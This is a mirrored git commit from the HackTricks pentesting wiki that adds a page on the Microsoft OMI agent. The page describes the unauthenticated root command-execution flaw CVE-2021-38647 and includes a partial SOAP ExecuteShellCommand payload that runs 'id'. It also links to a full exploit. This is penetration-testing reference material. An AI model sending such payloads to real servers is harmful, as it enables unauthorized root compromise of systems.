Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#2980] No subject

Browse source
This commit is contained in:
CPol 2022-02-02 14:36:35 +00:00 committed by gitbook-bot
parent f9971ff6b2
commit d162391473
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 46 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -339,6 +339,7 @@
* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)
* [5984,6984 - Pentesting CouchDB](pentesting/5984-pentesting-couchdb.md)
* [5985,5986 - Pentesting WinRM](pentesting/5985-5986-pentesting-winrm.md)
* [5985,5986 - Pentesting OMI](pentesting/5985-5986-pentesting-omi.md)
* [6000 - Pentesting X11](pentesting/6000-pentesting-x11.md)
* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
* [8009 - Pentesting Apache JServ Protocol (AJP)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)

45
pentesting/5985-5986-pentesting-omi.md Normal file
View file

@ -0,0 +1,45 @@
# 5985,5986 - Pentesting OMI
## Basic Information
OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers when the following services are in use:
* Azure Automation
* Azure Automatic Update
* Azure Operations Management Suite
* Azure Log Analytics
* Azure Configuration Management
* Azure Diagnostics
When these services are configured, the omiengine process will listen on all interfaces and being running as the root user.
![](https://strapi.horizon3ai.com/uploads/Screen\_Shot\_2021\_09\_16\_at\_5\_49\_01\_AM\_2c63a02c76.png)
**Default port:** 5985(http), 5986(https)
##  [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)
As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state.
The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user.
By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)
## References
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)